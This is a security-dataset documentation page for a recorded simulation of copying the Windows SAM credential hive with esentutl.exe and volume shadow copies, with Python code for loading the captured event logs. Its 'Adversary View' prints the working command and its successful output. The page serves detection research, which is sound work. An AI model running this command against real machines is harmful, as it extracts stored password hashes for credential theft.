SAM Copy via Esentutl VSS

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/10/19

Modification Date

2020/10/19

Tactics

TA0006

Techniques

T1003.002

Tags

art.a90c2f4d-6726-444e-99d2-a00cd7c20480

Dataset Description

This dataset represents adversaries copying the SAM hive using the esentutl.exe utility and volume shadow copy services.

Simulation Metadata

Tools

type

Name

Module

Manual

Cmd

Cmd

Adversary View

Microsoft Windows [Version 10.0.18363.1139]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\wardog>esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d C:\ProgramData\SAM

Extensible Storage Engine Utilities for Microsoft(R) Windows(R)
Version 10.0
Copyright (C) Microsoft Corporation. All Rights Reserved.

Initializing VSS subsystem...

Initiating COPY FILE mode...
    Source File: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32
Destination File: C:\ProgramData\SAM

                      Copy Progress (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

        Total bytes read                = 0x9000 (36864) (0 MB)
        Total bytes written             = 0x9000 (36864) (0 MB)


Operation completed successfully in 4.859 seconds.

C:\Users\wardog>

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/cmd_sam_copy_esentutl.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)